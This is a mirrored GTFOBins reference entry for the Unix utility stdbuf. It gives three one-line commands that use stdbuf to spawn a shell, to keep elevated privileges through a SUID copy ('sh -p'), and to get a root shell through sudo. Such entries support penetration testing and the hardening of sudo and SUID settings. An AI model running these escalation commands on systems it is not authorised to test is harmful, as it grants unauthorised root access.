mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-12 23:12:06 +01:00
10 lines
147 B
Markdown
10 lines
147 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: stdbuf -i0 /bin/sh
|
|
suid:
|
|
- code: ./stdbuf -i0 /bin/sh -p
|
|
sudo:
|
|
- code: sudo stdbuf -i0 /bin/sh
|
|
---
|